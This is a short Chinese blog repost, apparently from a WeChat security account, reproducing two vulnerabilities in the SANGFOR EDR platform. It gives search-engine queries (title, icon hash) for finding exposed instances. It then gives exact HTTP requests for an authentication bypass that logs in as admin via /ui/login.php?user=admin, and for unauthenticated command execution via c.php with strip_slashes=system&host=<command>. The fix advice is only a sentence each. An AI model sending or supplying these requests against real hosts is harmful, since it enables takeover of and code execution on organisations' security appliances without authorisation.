前言
来自网络,安全性自测。 |
作者:杳若
深信服-SANGFOR终端检测响应平台漏洞复现
通常访问的页面如下,存在登录框
信息收集
FOFA语法
title
=
"SANGFOR终端检测响应平台"
需重点关注框框的图标,可以聚焦资产搜索
icon_hash
=
"1307354852"
鹰图搜索
web
.
title
=
"SANGFOR终端检测响应平台"
可聚焦资产
web
.
icon
==
"68e28d49856759ddeb91b6be3d6f7e42"
SANGFOR终端检测响应平台 - 任意用户免密登录
漏洞复现
路由后拼接/ui/login.php?user={{需要登录的用户名}}
这边以admin
权限用户为例
GET
/
ui
/
login
.
php
?
user
=
admin HTTP
/
1.1
Host
:
{{
Hostname
}}
访问之后会像这样直接进入后台
修复方案
该类逻辑漏洞的起因往往与鉴权有关,需做好权限校验
SANGFOR终端检测响应平台 - 前台RCE
同一套系统
漏洞复现
路由后拼接/tool/log/c.php?strip_slashes=system&host={执行的命令}
命令执行以id
为例
GET
/
tool
/
log
/
c
.
php
?
strip_slashes
=
system
&
host
=
id HTTP
/
1.1
Host
:
{{
Hostname
}}
大致页面如下所示
修复方案
该目录代码层面的逻辑问题,需要进行鉴权以及重写等处理
原文始发于微信公众号(零信任攻防实验室):记一次某信的漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论